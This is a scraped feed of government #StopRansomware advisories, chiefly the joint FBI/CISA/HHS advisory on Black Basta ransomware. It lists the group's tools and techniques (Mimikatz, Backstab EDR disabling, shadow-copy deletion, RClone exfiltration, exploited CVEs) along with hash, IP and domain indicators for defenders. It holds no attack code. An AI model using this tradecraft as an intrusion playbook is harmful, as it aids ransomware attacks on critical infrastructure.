External Remote Services [T1133] | Hijack Execution Flow: DLL Search Order Hijacking [T1574.001] |
Scheduled Task/Job: Cron [T1053.003] | Hijack Execution Flow: DLL Side-Loading [T1574.002] |
Account Manipulation [T1098] | Valid Accounts: Cloud Accounts [T1078.004] |
Valid Accounts: Domain Accounts [T1078.002] |
Privilege Escalation (TA0004) | |
---|---|
Scheduled Task/Job: At [T1053.002] | Create or Modify System Process: Windows Service [T1543.003] |
Scheduled Task/Job: Scheduled Task [T1053.005] | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder [T1547.001] |
Process Injection: Thread Execution Hijacking [T1055.003] | Boot or Logon Autostart Execution: Shortcut Modification [T1547.009] |
Process Injection: Process Hollowing [T1055.012] | Hijack Execution Flow: DLL Search Order Hijacking [T1574.001] |
Valid Accounts: Domain Accounts [T1078.002] | Exploitation for Privilege Escalation [T1068] |
Access Token Manipulation: Token Impersonation/Theft [T1134.001] | Event Triggered Execution: Unix Shell Configuration Modification [T1546.004] |
Process Injection: Dynamic-link Library Injection [T1055.001] | Valid Accounts: Domain Accounts [T1078.002] |
Valid Accounts: Local Accounts [T1078.003] |
Defense Evasion (TA0005) | |
---|---|
Rootkit [T1014] | Indirect Command Execution [T1202] |
Obfuscated Files or Information [T1027] | System Binary Proxy Execution: Mshta [T1218.005] |
Obfuscated Files or Information: Software Packing [T1027.002] | System Binary Proxy Execution: Regsvr32 [T1218.010] |
Obfuscated Files or Information: Steganography [T1027.003] | Subvert Trust Controls: Code Signing [T1553.002] |
Obfuscated Files or Information: Compile After Delivery [T1027.004] | File and Directory Permissions Modifications: Linux and Mac File and Directory Permissions Modification [T1222.002] |
Masquerading: Match Legitimate Name or Location [T1036.005] | Virtualisation/Sandbox Evasion: System Checks [T1497.001] |
Process Injection: Thread Execution Hijacking [T1055.003] | Masquerading [T1036] |
Reflective Code Loading [T1620] | Impair Defences: Disable or Modify System Firewall [T1562.004] |
Process Injection: Process Hollowing [T1055.012] | Hide Artifacts: Hidden Files and Directories [T1564.001] |
Indicator Removal: File Deletion [T1070.004] | Hide Artifacts: Hidden Window [T1564.003] |
Indicator Removal: Timestomp [T1070.006] | Hijack Execution Flow: DLL Search Order Hijacking [T1574.001] |
Indicator Removal: Clear Windows Event Logs [T1070.001] | Hijack Execution Flow: DLL Side-Loading [T1574.002] |
Modify Registry [T1112] | Web Service [T1102] |
Deobfuscate/Decode Files or Information [T1140] | Masquerading: Masquerade Task or Service [T1036.004] |
Impair Defenses [T1562] |
Credential Access (TA0006) | |
---|---|
OS Credential Dumping: LSASS Memory [T1003.001] | Unsecured Credentials: Credentials in Files [T1552.001] |
OS Credential Dumping: NTDS [T1003.003] | Brute Force: Password Guessing [T1110.001] |
Network Sniffing [T1040] | Forced Authentication [T1187] |
Credentials from Password Stores: Keychain [T1555.001] | Steal or Forge Kerberos Tickets: Kerberoasting [T1558.003] |
Input Capture: Keylogging [T1056.001] | Multi-Factor Authentication Interception [T1111] |
Steal Web Session Cookie [T1539] | Steal Application Access Token [T1528] |
Exploitation for Credential Access [T1212] | Brute Force: Password Cracking [T1110.002] |
Input Capture: Web Portal Capture [T1056.003] | OS Credential Dumping: DCSync [T1003.006] |
Credentials from Password Stores [T1555] | Credentials from Password Stores: Credentials from Web Browsers [T1555.003] |
Discovery (TA0007) | |
---|---|
System Service Discovery [T1007] | System Information Discovery [T1082] |
Application Window Discovery [T1010] | Account Discovery: Local Account [T1087.001] |
Query Registry [T1012] | System Information Discovery, Technique T1082 - Enterprise | MITRE ATT&CK® |
File and Directory Discovery [T1083] | System Time Discovery [T1124] |
Network Service Discovery [T1046] | System Owner/User Discovery [T1033] |
Remote System Discovery [T1018] | Domain Trust Discovery [T1482] |
Account Discovery: Email Account [T1087.003] | Account Discovery: Domain Account [T1087.002] |
System Network Connections Discovery [T1049] | Virtualisation/Sandbox Evasion: System Checks [T1497.001] |
Process Discovery [T1057] | Software Discovery [T1518] |
Permission Groups Discovery: Domain Groups [T1069.002] | Network Share Discovery, Technique T1135 - Enterprise | MITRE ATT&CK® |
System Network Configuration Discovery: Internet Connection Discovery [T1016.001] |
Lateral Movement (TA0008) | |
---|---|
Remote Services: Remote Desktop Protocol [T1021.001] | Remote Services [T1021] |
Remote Services: SMB/Windows Admin Shares [T1021.002] | Use Alternate Authentication Material: Pass the Ticket [T1550.003] |
Remote Services: Windows Remote Management [T1021.006] | Lateral Tool Transfer [T1570] |
Collection (TA0009) | |
---|---|
Data from Local System [T1005] | Archive Collected Data: Archive via Library [T1560.002] |
Data from Network Shared Drive [T1039] | Email Collection: Remote Email Collection [T1114.002] |
Input Capture: Keylogging [T1056.001] | Clipboard Data [T1115] |
Automated Collection [T1119] | Data from Information Repositories [T1213] |
Input Capture: Web Portal Capture [T1056.003] | Data Staged: Remote Data Staging [T1074.002] |
Data Staged: Local Data Staging [T1074.001] | Archive Collected Data [T1560] |
Email Collection [T1114] |
Exfiltration (TA0010) | |
---|---|
Exfiltration Over C2 Channel [T1041] | Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [T1048.002] |
Exfiltration Over Alternative Protocol [T1048] | Exfiltration Over Web Service: Exfiltration to Cloud Storage [T1567.002] |
Command and Control (TA0011) | |
---|---|
Data Obfuscation: Protocol Impersonation [T1001.003] | Web Service: Dead Drop Resolver [T1102.001] |
Commonly Used Port [T1043] | Web Service: One-way Communication [T1102.003] |
Application Layer Protocol: Web Protocols [T1071.001] | Ingress Tool Transfer [T1105] |
Application Layer Protocol: File Transfer Protocols [T1071.002] | Proxy: Internal Proxy [T1090.001] |
Proxy: External Proxy [T1090.002] | Non-Standard Port [T1571] |
Proxy: Multi-hop Proxy [T1090.003] | Protocol Tunnelling [T1572] |
Web Service: Bidirectional Communication [T1102.002] | Encrypted Channel [T1573] |
Encrypted Channel: Asymmetric Cryptography [T1573.002] | Ingress Tool Transfer [T1105] |
Proxy, Technique T1090 - Enterprise | MITRE ATT&CK® |
Impact (TA0040) | |
---|---|
Service Stop [T1489] | Disk Wipe [T1561] |
System Shutdown/Reboot [T1529] | Resource Hijacking [T1496] |
[1] U.S. Department of Justice. 2021. Four Chinese Nationals Working with the Ministry of State Security Charged with Global Computer Intrusion Campaign Targeting Intellectual Property and Confidential Business Information, Including Infectious Disease Research.
[2] In this context, an endpoint is a function of the web application.
[3] Service accounts are not tied to individual users, but rather to services. In a Microsoft corporate domain, there are various kinds of accounts.
[4] Mounting shares is the process of making files on a file system structure accessible to a user or user group.
]]>
Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.
The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), Department of Health and Human Services (HHS), and Multi-State Information Sharing and Analysis Center (MS-ISAC) (hereafter referred to as the authoring organizations) are releasing this joint CSA to provide information on Black Basta, a ransomware variant whose actors have encrypted and stolen data from at least 12 out of 16 critical infrastructure sectors, including the Healthcare and Public Health (HPH) Sector.
This joint CSA provides TTPs and IOCs obtained from FBI investigations and third-party reporting. Black Basta is considered a ransomware-as-a-service (RaaS) variant and was first identified in April 2022. Black Basta affiliates have impacted a wide range of businesses and critical infrastructure in North America, Europe, and Australia. As of May 2024, Black Basta affiliates have impacted over 500 organizations globally.
Black Basta affiliates use common initial access techniques—such as phishing and exploiting known vulnerabilities—and then employ a double-extortion model, both encrypting systems and exfiltrating data. Ransom notes do not generally include an initial ransom demand or payment instructions. Instead, the notes provide victims with a unique code and instructs them to contact the ransomware group via a .onion
URL (reachable through the Tor browser). Typically, the ransom notes give victims between 10 and 12 days to pay the ransom before the ransomware group publishes their data on the Black Basta TOR site, Basta News.
Healthcare organizations are attractive targets for cybercrime actors due to their size, technological dependence, access to personal health information, and unique impacts from patient care disruptions. The authoring organizations urge HPH Sector and all critical infrastructure organizations to apply the recommendations in the Mitigations section of this CSA to reduce the likelihood of compromise from Black Basta and other ransomware attacks. Victims of ransomware should report the incident to their local FBI field office or CISA (see the Reporting section for contact information).
Download the PDF version of this report:
Note: This advisory uses the MITRE ATT&CK for Enterprise framework, version 15. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK® tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.
Black Basta affiliates primarily use spearphishing [T1566] to obtain initial access. According to cybersecurity researchers, affiliates have also used Qakbot during initial access.[1]
Starting in February 2024, Black Basta affiliates began exploiting ConnectWise vulnerability CVE-2024-1709 [CWE-288] [T1190]. In some instances, affiliates have been observed abusing valid credentials [T1078].
Black Basta affiliates use tools such as SoftPerfect network scanner (netscan.exe
) to conduct network scanning. Cybersecurity researchers have observed affiliates conducting reconnaissance using utilities with innocuous file names such as Intel
or Dell
, left in the root drive C:
[T1036].[1]
Black Basta affiliates use tools such as BITSAdmin and PsExec, along with Remote Desktop Protocol (RDP), for lateral movement. Some affiliates also use tools like Splashtop, Screen Connect, and Cobalt Strike beacons to assist with remote access and lateral movement.
Black Basta affiliates use credential scraping tools like Mimikatz for privilege escalation. According to cybersecurity researchers, Black Basta affiliates have also exploited ZeroLogon (CVE-2020-1472, [CWE-330]), NoPac (CVE-2021-42278 [CWE-20] and CVE-2021-42287 [CWE-269]), and PrintNightmare (CVE-2021-34527, [CWE-269]) vulnerabilities for local and Windows Active Domain privilege escalation [T1068].[1],[2]
Black Basta affiliates use RClone to facilitate data exfiltration prior to encryption. Prior to exfiltration, cybersecurity researchers have observed Black Basta affiliates using PowerShell [T1059.001] to disable antivirus products, and in some instances, deploying a tool called Backstab, designed to disable endpoint detection and response (EDR) tooling [T1562.001].[3] Once antivirus programs are terminated, a ChaCha20 algorithm with an RSA-4096 public key fully encrypts files [T1486]. A .basta
or otherwise random file extension is added to file names and a ransom note titled readme.txt
is left on the compromised system.[4] To further inhibit system recovery, affiliates use the vssadmin.exe
program to delete volume shadow copies [T1490].[5]
See Table 1 for publicly available tools and applications used by Black Basta affiliates. This includes legitimate tools repurposed for their operations.
Disclaimer: Use of these tools and applications should not be attributed as malicious without analytical evidence to support threat actor use and/or control.
Tool Name | Description |
---|---|
BITSAdmin | A command-line utility that manages downloads/uploads between a client and server by using the Background Intelligent Transfer Service (BITS) to perform asynchronous file transfers. |
Cobalt Strike | A penetration testing tool used by security professions to test the security of networks and systems. Black Basta affiliates have used it to assist with lateral movement and file execution. |
Mimikatz | A tool that allows users to view and save authentication credentials such as Kerberos tickets. Black Basta affiliates have used it to aid in privilege escalation. |
PSExec | A tool designed to run programs and execute commands on remote systems. |
PowerShell | A cross-platform task automation solution made up of a command-line shell, a scripting language, and a configuration management framework, which runs on Windows, Linux, and macOS. |
RClone | A command line program used to sync files with cloud storage services such as Mega. |
SoftPerfect | A network scanner (netscan.exe ) used to ping computers, scan ports, discover shared folders, and retrieve information about network devices via Windows Management Instrumentation (WMI), Simple Network Management Protocol (SNMP), HTTP, Secure Shell (SSH) and PowerShell. It also scans for remote services, registry, files, and performance counters. |
ScreenConnect | Remote support, access, and meeting software that allows users to control devices remotely over the internet. |
Splashtop | Remote desktop software that allows remote access to devices for support, access, and collaboration. |
WinSCP | Windows Secure Copy is a free and open source SSH File Transfer Protocol, File Transfer Protocol, WebDAV, Amazon S3, and secure copy protocol client. Black Basta affiliates have used it to transfer data from a compromised network to actor-controlled accounts. |
See Tables 2–6 for all referenced threat actor tactics and techniques in this advisory.
Technique Title | ID | Use |
---|---|---|
Phishing | T1566 | Black Basta affiliates have used spearphishing emails to obtain initial access. |
Exploit Public-Facing Application | T1190 | Black Basta affiliates have exploited ConnectWise vulnerability CVE-2024-1709 to obtain initial access. |
Technique Title | ID | Use |
---|---|---|
Exploitation for Privilege Escalation | T1068 | Black Basta affiliates have used credential scraping tools like Mimikatz, Zerologon, NoPac and PrintNightmare for privilege escalation. |
Technique Title | ID | Use |
---|---|---|
Masquerading | T1036 | Black Basta affiliates have conducted reconnaissance using utilities with innocuous file names, such as Intel or Dell , to evade detection. |
Impair Defenses: Disable or Modify Tools | T1562.001 |
Black Basta affiliates have deployed a tool called Backstab to disable endpoint detection and response (EDR) tooling. Black Basta affiliates have used PowerShell to disable antivirus products. |
Technique Title | ID | Use |
---|---|---|
Command and Scripting Interpreter: PowerShell | T1059.001 | Black Basta affiliates have used PowerShell to disable antivirus products. |
See Table 7 for IOCs obtained from FBI investigations.
Hash | Description |
---|---|
0112e3b20872760dda5f658f6b546c85f126e803e27f0577b294f335ffa5a298 | rclone.exe |
d3683beca3a40574e5fd68d30451137e4a8bbaca8c428ebb781d565d6a70385e | Winscp.exe |
88c8b472108e0d79d16a1634499c1b45048a10a38ee799054414613cc9dccccc | DLL |
58ddbea084ce18cfb3439219ebcf2fc5c1605d2f6271610b1c7af77b8d0484bd | DLL |
39939eacfbc20a2607064994497e3e886c90cd97b25926478434f46c95bd8ead | DLL |
5b2178c7a0fd69ab00cef041f446e04098bbb397946eda3f6755f9d94d53c221 | DLL |
51eb749d6cbd08baf9d43c2f83abd9d4d86eb5206f62ba43b768251a98ce9d3e | DLL |
d15bfbc181aac8ce9faa05c2063ef4695c09b718596f43edc81ca02ef03110d1 | DLL |
5942143614d8ed34567ea472c2b819777edd25c00b3e1b13b1ae98d7f9e28d43 | DLL |
05ebae760340fe44362ab7c8f70b2d89d6c9ba9b9ee8a9f747b2f19d326c3431 | DLL |
a7b36482ba5bca7a143a795074c432ed627d6afa5bc64de97fa660faa852f1a6 | DLL |
86a4dd6be867846b251460d2a0874e6413589878d27f2c4482b54cec134cc737 | DLL |
07117c02a09410f47a326b52c7f17407e63ba5e6ff97277446efc75b862d2799 | DLL |
96339a7e87ffce6ced247feb9b4cb7c05b83ca315976a9522155bad726b8e5be | ELF |
1c1b2d7f790750d60a14bd661dae5c5565f00c6ca7d03d062adcecda807e1779 | ELF |
360c9c8f0a62010d455f35588ef27817ad35c715a5f291e43449ce6cb1986b98 | ELF |
0554eb2ffa3582b000d558b6950ec60e876f1259c41acff2eac47ab78a53e94a | EXE |
9a55f55886285eef7ffabdd55c0232d1458175b1d868c03d3e304ce7d98980bc | EXE |
62e63388953bb30669b403867a3ac2c8130332cf78133f7fd4a7f23cdc939087 | EXE |
7ad4324ea241782ea859af12094f89f9a182236542627e95b6416c8fb9757c59 | EXE |
350ba7fca67721c74385faff083914ecdd66ef107a765dfb7ac08b38d5c9c0bd | EXE |
90ba27750a04d1308115fa6a90f36503398a8f528c974c5adc07ae8a6cd630e7 | EXE |
fafaff3d665b26b5c057e64b4238980589deb0dff0501497ac50be1bc91b3e08 | EXE |
acb60f0dd19a9a26aaaefd3326db8c28f546b6b0182ed2dcc23170bcb0af6d8f | EXE |
d73f6e240766ddd6c3c16eff8db50794ab8ab95c6a616d4ab2bc96780f13464d | EXE |
f039eaaced72618eaba699d2985f9e10d252ac5fe85d609c217b45bc8c3614f4 | EXE |
723d1cf3d74fb3ce95a77ed9dff257a78c8af8e67a82963230dd073781074224 | EXE |
ae7c868713e1d02b4db60128c651eb1e3f6a33c02544cc4cb57c3aa6c6581b6e | EXE |
fff35c2da67eef6f1a10c585b427ac32e7f06f4e4460542207abcd62264e435f | EXE |
df5b004be71717362e6b1ad22072f9ee4113b95b5d78c496a90857977a9fb415 | EXE |
462bbb8fd7be98129aa73efa91e2d88fa9cafc7b47431b8227d1957f5d0c8ba7 | EXE |
3c50f6369f0938f42d47db29a1f398e754acb2a8d96fd4b366246ac2ccbe250a | EXE |
5d2204f3a20e163120f52a2e3595db19890050b2faa96c6cba6b094b0a52b0aa | EXE |
37a5cd265f7f555f2fe320a68d70553b7aa9601981212921d1ac2c114e662004 | EXE |
3090a37e591554d7406107df87b3dc21bda059df0bc66244e8abef6a5678af35 | EXE |
17879ed48c2a2e324d4f5175112f51b75f4a8ab100b8833c82e6ddb7cd817f20 | EXE |
42f05f5d4a2617b7ae0bc601dd6c053bf974f9a337a8fcc51f9338b108811b78 | EXE |
882019d1024778e13841db975d5e60aaae1482fcf86ba669e819a68ce980d7d3 | EXE |
e28188e516db1bda9015c30de59a2e91996b67c2e2b44989a6b0f562577fd757 | EXE |
0a8297b274aeab986d6336b395b39b3af1bb00464cf5735d1ecdb506fef9098e | EXE |
69192821f8ce4561cf9c9cb494a133584179116cb2e7409bea3e18901a1ca944 | EXE |
3337a7a9ccdd06acdd6e3cf4af40d871172d0a0e96fc48787b574ac93689622a | EXE |
17205c43189c22dfcb278f5cc45c2562f622b0b6280dcd43cc1d3c274095eb90 | EXE |
b32daf27aa392d26bdf5faafbaae6b21cd6c918d461ff59f548a73d447a96dd9 | EXE |
See Tables 8–11 for IOCs obtained from trusted third-party reporting.
Disclaimer: The authoring organizations recommend network defenders investigate or vet IP addresses prior to taking action, such as blocking, as many cyber actors are known to change IP addresses, sometimes daily, and some IP addresses may host valid domains.
IP Address | Description |
---|---|
66.249.66[.]18 | 0gpw.588027fa.dns.realbumblebee[.]net, dns.trailshop[.]net, dns.artspathgroupe[.]net |
66.249.66[.]18 | my.2a91c002002.588027fa.dns.realbumblebee[.]net |
66.249.66[.]18 | fy9.39d9030e5d3a8e2352daae2f4cd3c417b36f64c6644a783b9629147a1.afd8b8a4615358e0313bad8c544a1af0d8efcec0e8056c2c8eee96c7.b06d1825c0247387e38851b06be0272b0bd619b7c9636bc17b09aa70.a46890f27.588027fa.dns.realbumblebee[.]net |
95.181.173[.]227 | adslsdfdsfmo[.]world |
fy9.36c44903529fa273afff3c9b7ef323432e223d22ae1d625c4a3957d57.015c16eff32356bf566c4fd3590c6ff9b2f6e8c587444ecbfc4bcae7.f71995aff9e6f22f8daffe9d2ad9050abc928b8f93bb0d42682fd3c3.445de2118.588027fa.dns.realbumblebee[.]net | |
207.126.152[.]242 | xkpal.d6597fa.dns.blocktoday.net nuher.3577125d2a75f6a277fc5714ff536c5c6af5283d928a66daad6825b9a.7aaf8bba88534e88ec89251c57b01b322c7f52c7f1a5338930ae2a50.cbb47411f60fe58f76cf79d300c03bdecfb9e83379f59d80b8494951.e10c20f77.7fcc0eb6.dns.blocktoday[.]net |
72.14.196[.]50 | .rasapool[.]net, dns.trailshop[.]net |
72.14.196[.]192 | .rasapool[.]net |
72.14.196[.]2 | .rasapool[.]net |
72.14.196[.]226 | .rasapool[.]net |
46.161.27[.]151 | |
207.126.152[.]242 | nuher.1d67bbcf4.456d87aa6.2d84dfba.dns.specialdrills[.]com |
185.219.221[.]136 | |
64.176.219[.]106 | |
5.78.115[.]67 | your-server[.]de |
207.126.152[.]242 | xkpal.1a4a64b6.dns.blocktoday[.]net |
46.8.16[.]77 | |
185.7.214[.]79 | VPN Server |
185.220.100[.]240 | Tor exit |
107.189.30[.]69 | Tor exit |
5.183.130[.]92 | |
185.220.101[.]149 | Tor exit |
188.130.218[.]39 | |
188.130.137[.]181 | |
46.8.10[.]134 | |
155.138.246[.]122 | |
80.239.207[.]200 | winklen[.]ch |
183.181.86[.]147 | Xserver[.]jp |
34.149.120[.]3 | |
104.21.40[.]72 | |
34.250.161[.]149 | |
88.198.198[.]90 | your-server[.]de; literoved[.]ru |
151.101.130[.]159 | |
35.244.153[.]44 | |
35.212.86[.]55 | |
34.251.163[.]236 | |
34.160.81[.]203 | |
34.149.36[.]179 | |
104.21.26[.]145 | |
83.243.40[.]10 | |
35.227.194[.]51 | |
35.190.31[.]54 | |
34.120.190[.]48 | |
116.203.186[.]178 | |
34.160.17[.]71 |
Filename | Hash |
---|---|
C:UsersPublicAudioJun.exe | b6a4f4097367d9c124f51154d8750ea036a812d5badde0baf9c5f183bb53dd24 |
C:UsersPublicAudioesx.zip | |
C:UsersPublicAudio7zG.exe | f21240e0bf9f0a391d514e34d4fa24ecb997d939379d2260ebce7c693e55f061 |
C:UsersPublicAudio7z.dll | |
C:UsersPublicdb_Usr.sql | 8501e14ee6ee142122746333b936c9ab0fc541328f37b5612b6804e6cdc2c2c6 |
C:UsersPublicAudiodb_Usr.sql | |
C:UsersPublicAudiohv2.ps1 | |
C:UsersPublic7zG.exe | |
C:UsersPublic7z.dll | |
C:UsersPublicBitLogic.dll | |
C:UsersPublicNetApp.exe | 4c897334e6391e7a2fa3cbcbf773d5a4 |
C:UsersPublicDataSoft.exe | 2642ec377c0cee3235571832cb472870 |
C:UsersPublicBitData.exe | b3fe23dd4701ed00d79c03043b0b952e |
C:UsersPublicDigitalText.dll | |
C:UsersPublicGeniusMesh.exe | |
DeviceMup{redacted}C$UsersPublicMusicPROCEXP.sys | |
DeviceMup{redacted}C$UsersPublicMusicDumpNParse86.exe | |
DeviceMup{redacted}C$UsersPublicMusicPOSTDump.exe | |
DeviceMup{redacted}C$UsersPublicMusicDumpNParse.exe | |
C:UsersPublicsocksps.ps1 | |
C:UsersPublicThief.exe | 034b5fe047920b2ae9493451623633b14a85176f5eea0c7aadc110ea1730ee79 |
C:UsersAll Users{redacted}GWT.ps1 C:Program FilesMonitorITGWT.ps1 |
8C68B2A794BA3D148CAE91BDF9C8D357289752A94118B5558418A36D95A5A45F |
Winx86.exe Comment: alias for cmd.exe |
|
C:UsersPubliceucr.exe | 3c65da7f7bfdaf9acc6445abbedd9c4e927d37bb9e3629f34afc338058680407 |
C:WindowsDS_c1.dll | 808c96cb90b7de7792a827c6946ff48123802959635a23bf9d98478ae6a259f9 |
C:WindowsDS_c1.dll | 3a8fc07cadc08eeb8be342452636a754158403c3d4ebff379a4ae66f8298d9a6 |
C:WindowsDS_c1.dll | 4ac69411ed124da06ad66ee8bfbcea2f593b5b199a2c38496e1ee24f9d04f34a |
C:WindowsDS_c1.dll | 819cb9bcf62be7666db5666a693524070b0df589c58309b067191b30480b0c3a |
C:WindowsDS_c1.dll | c26a5cb62a78c467cc6b6867c7093fbb7b1a96d92121d4d6c3f0557ef9c881e0 |
C:WindowsDS_c1.dll | d503090431fdd99c9df3451d9b73c5737c79eda6eb80c148b8dc71e84623401f |
*instructions_read_me.txt |
Domain | Date/Time (UTC)/Time (UTC) |
---|---|
trailshop[.]net | 5/8/2024 6:37 |
realbumblebee[.]net | 5/8/2024 6:37 |
recentbee[.]net | 5/8/2024 6:37 |
investrealtydom[.]net | 5/8/2024 6:37 |
webnubee[.]com | 5/8/2024 6:37 |
artspathgroup[.]net | 5/8/2024 6:37 |
buyblocknow[.]com | 5/8/2024 6:37 |
currentbee[.]net | 5/8/2024 6:37 |
modernbeem[.]net | 5/8/2024 6:37 |
startupbusiness24[.]net | 5/8/2024 6:37 |
magentoengineers[.]com | 5/8/2024 6:37 |
childrensdolls[.]com | 5/8/2024 6:37 |
myfinancialexperts[.]com | 5/8/2024 6:37 |
limitedtoday[.]com | 5/8/2024 6:37 |
kekeoamigo[.]com | 5/8/2024 6:37 |
nebraska-lawyers[.]com | 5/8/2024 6:37 |
tomlawcenter[.]com | 5/8/2024 6:37 |
thesmartcloudusa[.]com | 5/8/2024 6:37 |
rasapool[.]net | 5/8/2024 6:37 |
artspathgroupe[.]net | 5/8/2024 6:37 |
specialdrills[.]com | 5/8/2024 6:37 |
thetrailbig[.]net | 5/8/2024 6:37 |
consulheartinc[.]com | 3/22/2024 15:35 |
otxcosmeticscare[.]com | 3/15/2024 10:14 |
otxcarecosmetics[.]com | 3/15/2024 10:14 |
artstrailman[.]com | 3/15/2024 10:14 |
ontexcare[.]com | 3/15/2024 10:14 |
trackgroup[.]net | 3/15/2024 10:14 |
businessprofessionalllc[.]com | 3/15/2024 10:14 |
securecloudmanage[.]com | 3/7/2024 10:42 |
oneblackwood[.]com | 3/7/2024 10:42 |
buygreenstudio[.]com | 3/7/2024 10:42 |
startupbuss[.]com | 3/7/2024 10:42 |
onedogsclub[.]com | 3/4/2024 18:26 |
wipresolutions[.]com | 3/4/2024 18:26 |
recentbeelive[.]com | 3/4/2024 18:26 |
trailcocompany[.]com | 3/4/2024 18:26 |
trailcosolutions[.]com | 3/4/2024 18:26 |
artstrailreviews[.]com | 3/4/2024 18:26 |
usaglobalnews[.]com | 2/15/2024 5:56 |
topglobaltv[.]com | 2/15/2024 5:56 |
startupmartec[.]net | 2/15/2024 5:56 |
technologgies[.]com | 1/2/2024 18:16 |
jenshol[.]com | 1/2/2024 18:16 |
simorten[.]com | 1/2/2024 18:16 |
investmentgblog[.]net | 1/2/2024 18:16 |
protectionek[.]com | 1/2/2024 18:16 |
airbusco[.]net |
allcompanycenter[.]com |
animalsfast[.]net |
audsystemecll[.]net |
auuditoe[.]com |
bluenetworking[.]net |
brendonline[.]com |
businesforhome[.]com |
caspercan[.]com |
clearsystemwo[.]net |
cloudworldst[.]net |
constrtionfirst[.]com |
erihudeg[.]com |
garbagemoval[.]com |
gartenlofti[.]com |
getfnewsolutions[.]com |
getfnewssolutions[.]com |
investmendvisor[.]net |
investmentrealtyhp[.]net |
ionoslaba[.]com |
jessvisser[.]com |
karmafisker[.]com |
kolinileas[.]com |
maluisepaul[.]com |
masterunix[.]net |
monitor-websystem[.]net |
monitorsystem[.]net |
mytrailinvest[.]net |
prettyanimals[.]net |
reelsysmoona[.]net |
seohomee[.]com |
septcntr[.]com |
softradar[.]net |
startupbizaud[.]net |
startuptechnologyw[.]net |
steamteamdev[.]net |
stockinvestlab[.]net |
taskthebox[.]net |
trailgroupl[.]net |
treeauwin[.]net |
unitedfrom[.]com |
unougn[.]com |
wardeli[.]com |
welausystem[.]net |
wellsystemte[.]net |
withclier[.]com |
The authoring organizations recommend all critical infrastructure organizations implement the mitigations below to improve your organization’s cybersecurity posture based on Black Basta’s activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.
The authoring organizations also recommend network defenders of HPH Sector and other critical infrastructure organizations to reference CISA’s Mitigation Guide: Healthcare and Public Health (HPH) Sector and HHS’s HPH Cybersecurity Performance Goals, which provide best practices to combat pervasive cyber threats against organizations. Recommendations include the following:
In addition to applying mitigations, the authoring organizations recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. The authoring organizations recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
To get started:
The authoring organizations recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.
Your organization has no obligation to respond or provide information back to FBI in response to this joint CSA. If, after reviewing the information provided, your organization decides to provide information to FBI, reporting must be consistent with applicable state and federal laws.
FBI is interested in any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with threat actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file.
Additional details of interest include: a targeted company point of contact, status and scope of infection, estimated loss, operational impact, transaction IDs, date of infection, date detected, initial attack vector, and host- and network-based indicators.
FBI, CISA, and HHS do not encourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, FBI and CISA urge you to promptly report ransomware incidents to FBI’s Internet Crime Complain Center (IC3), a local FBI Field Office, or CISA via the agency’s Incident Reporting System or its 24/7 Operations Center (report@cisa.gov or by calling 1-844-Say-CISA [1-844-729-2472]).
The information in this report is being provided “as is” for informational purposes only. FBI, CISA, HHS, and MS-ISAC do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by FBI, CISA, HHS, and MS-ISAC.
May 10, 2024: Initial version.
Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.
The United States’ Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), Europol’s European Cybercrime Centre (EC3), and the Netherlands’ National Cyber Security Centre (NCSC-NL) are releasing this joint CSA to disseminate known Akira ransomware IOCs and TTPs identified through FBI investigations and trusted third party reporting as recently as February 2024.
Since March 2023, Akira ransomware has impacted a wide range of businesses and critical infrastructure entities in North America, Europe, and Australia. In April 2023, following an initial focus on Windows systems, Akira threat actors deployed a Linux variant targeting VMware ESXi virtual machines. As of January 1, 2024, the ransomware group has impacted over 250 organizations and claimed approximately $42 million (USD) in ransomware proceeds.
Early versions of the Akira ransomware variant were written in C++ and encrypted files with a .akira
extension; however, beginning in August 2023, some Akira attacks began deploying Megazord, using Rust-based code which encrypts files with a .powerranges
extension. Akira threat actors have continued to use both Megazord and Akira, including Akira_v2 (identified by trusted third party investigations) interchangeably.
The FBI, CISA, EC3, and NCSC-NL encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of ransomware incidents.
Download the PDF version of this report:
Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 14. See MITRE ATT&CK for Enterprise for all referenced tactics and techniques.
